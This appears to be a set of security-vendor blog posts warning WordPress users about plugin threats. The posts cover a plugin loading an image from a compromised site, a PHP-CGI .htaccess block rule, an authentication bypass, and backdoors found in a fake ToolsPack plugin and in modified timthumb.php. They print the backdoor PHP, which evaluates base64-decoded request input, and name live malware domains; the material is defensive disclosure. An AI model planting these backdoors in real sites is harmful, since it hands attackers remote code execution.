If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.
Sociable WordPress Plugin Security Warning
If you are using the Sociable WordPress Plugin (plugin with 1,777,161 downloads), be very careful when visiting the plugin’s page settings. We recommend that you disable it or remove it for now, at least until it gets fixed.
A customer alerted us to the issue: when you visit the settings page (e.g., site.com/wp-admin/options-general.php?page=sociable_select) you get a malware warning from Google (“this site may harm your computer”).
What is going on?
The issue is that the plugin is loading an image from a site that is currently compromised (inside this file: includes/class-sociable_Admin_Options.php):
http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png
That causes the browser to redirect to http://commitse.ru/ (known malware site). This is what happens when you load that image:
$ curl -D - -A "" http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png
HTTP/1.1 302 Found
Date: Fri, 07 Sep 2012 21:02:59 GMT
Server: Apache
Location: httx://commitse .ru
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
There are some discussions on the WordPress forums about it here: http://wordpress.org/support/topic/plugin-sociable-image-causing-malware-detected-flags, but in the meantime, we recommend users delete or disable the plugin.
It doesn’t look like the plugin was compromised, just an external image was used and the site housing that image is currently compromised.
We will post more details when we have it.
Official WordPress Plugin Directory – Forcing Plugin Updates
For a while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is that updates were forced – certainly for the major vulnerabilities.
In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.
Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability
Today we released an update on the latest PHP CGI vulnerability and provided some additional information that users can use to help protect against it.
Guidance includes updating your .htaccess file with the following:
RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]
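To make the two RewriteCond lines concrete, here is an added example (not code from the original post or from the Sucuri plugin) that implements the same test in Python and runs it over a few constructed access-log lines, so you can check which requests the rule would answer with 403. The log lines and IP addresses are made up for illustration.

```python
import re

# Condition 1: the query string contains no '=' at all (^[^=]*$).
# Condition 2: the query string contains '%2d' or '-' ([NC] = case-insensitive).
# Apache does not URL-decode %{QUERY_STRING}, so '%2d' is matched literally here too.
_NO_EQUALS = re.compile(r"^[^=]*$")
_HAS_DASH = re.compile(r"%2d|-", re.IGNORECASE)


def rewrite_rule_blocks(query_string: str) -> bool:
    """True when the .htaccess rules above would return 403 Forbidden."""
    return bool(_NO_EQUALS.match(query_string)) and bool(_HAS_DASH.search(query_string))


def query_string_of(request_target: str) -> str:
    """Extract the query string from a request target such as '/index.php?foo'."""
    _, sep, qs = request_target.partition("?")
    return qs if sep else ""


def flag_log_lines(lines):
    """Return (line, blocked) pairs for Apache common-log lines, judged by their request target."""
    results = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
        if not m:
            continue  # not a request line we understand; skip it
        results.append((line, rewrite_rule_blocks(query_string_of(m.group(1)))))
    return results


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2012:21:02:59 +0000] "GET /index.php?-foo HTTP/1.1" 200 512',
    '203.0.113.5 - - [07/Sep/2012:21:03:01 +0000] "GET /index.php?%2Dbar HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Sep/2012:21:03:05 +0000] "GET /wp-admin/options-general.php?page=sociable_select HTTP/1.1" 200 1024',
    '198.51.100.7 - - [07/Sep/2012:21:03:09 +0000] "GET /?p=1&tag=wp-security HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line, blocked in flag_log_lines(SAMPLE_LOG):
        print("BLOCK " if blocked else "allow ", line)
```

Note the edge case the rule encodes: a hyphen is only blocked when the query string has no `=` anywhere, so ordinary `?tag=wp-security` style parameters pass while bare flag-style query strings do not.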
It is important to note however that if you are on WordPress and currently using our Free security plugin you are protected. We are actively seeing the attack across our growing network of plugin users and proactively pushing changes to protect our users.
Sucuri Security WordPress Plugin Free To Clients: Getting Proactive with Web Malware
We are happy to announce that our premium WordPress plugin is now free to all our existing and new clients. The plugin is a great complement to our malware scanning and remediation services and provides a large array of features designed to help you combat the growing web malware problem.
Note: the plugin is available under all our existing plans for all our users.
We have started to get questions asking whether this is the only plugin required for all your security needs; the answer is “no”. It is meant to complement your arsenal and help you become more proactive when it comes to securing your WordPress instance.
Vulnerability in the Absolute Privacy Plugin
We are seeing reports that a vulnerability in the Absolute Privacy WordPress plugin (link) is being used to hack and compromise sites with it installed.
This plugin has a serious unpatched security vulnerability that allows anyone to log in to the WordPress site without a password. From Secunia:
Schaffnern has discovered a vulnerability in the Absolute Privacy plugin for WordPress, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to an error within the “abpr_authenticateUser()” function in wp-content/plugins/absolute-privacy/functions.php, which prevents the password from being verified. This can be exploited to bypass the authentication mechanism and gain administrative access to the application.
The vulnerability is confirmed in version 2.0.5. Other versions may also be affected.
Note that this plugin has had more than 35 thousand downloads and there is no patch for this bug. We recommend deleting this plugin as soon as possible, until a fix is in place.
Our team is still analysing this vulnerability and we will post more details soon. Additional information and the original report can be found here.
If you think your site has been compromised, you can verify it in here: http://sitecheck.sucuri.net
New WordPress ToolsPack Plugin
We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.
They have installed a plugin called ToolsPack (./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Interesting…
However, when we look at the plugin code, all it does is this:
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of the compromised websites we noticed it was installed via wp-admin (so stolen passwords), and on others it was installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
Have you seen this plugin, or something like it? Make sure to leave a comment with your experience.
Site is hacked? Not sure? Check here http://sitecheck.sucuri.net
Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin
If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.
The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2”, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.
TimThumb.php backdoor
If your site was compromised recently through the TimThumb.php vulnerability, make sure to check that script to see whether it was also modified to act as a backdoor.
We are seeing in many sites the timthumb.php with the following code added to it:
if (md5 (md5($_POST['p']))==='xxx8ab2ab.. a4ec61072xxx')
die (eval ( base64_decode ($_POST['c'])));
If you are not sure what this code does: it receives a password via the “p” POST variable and, if it is correct, executes any PHP code sent by the attackers in the “c” POST variable.
For more details on the timthumb.php vulnerability, check our multiple posts about it: here. For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?
TimThumb.php Vulnerability Not Only Affecting Themes – Plugins too
The Timthumb.php vulnerability is being used in the wild to hack and infect thousands of WordPress sites.
Hopefully everyone is checking their themes and updating the script to make sure it is not vulnerable. This is wishful thinking.
Unfortunately, the issue is not limited to themes alone. There are some plugins that include the TimThumb.php script, and you need to check and update them as well (if you are not sure how to do so, check out this post; we’ve included a script to automate it for you).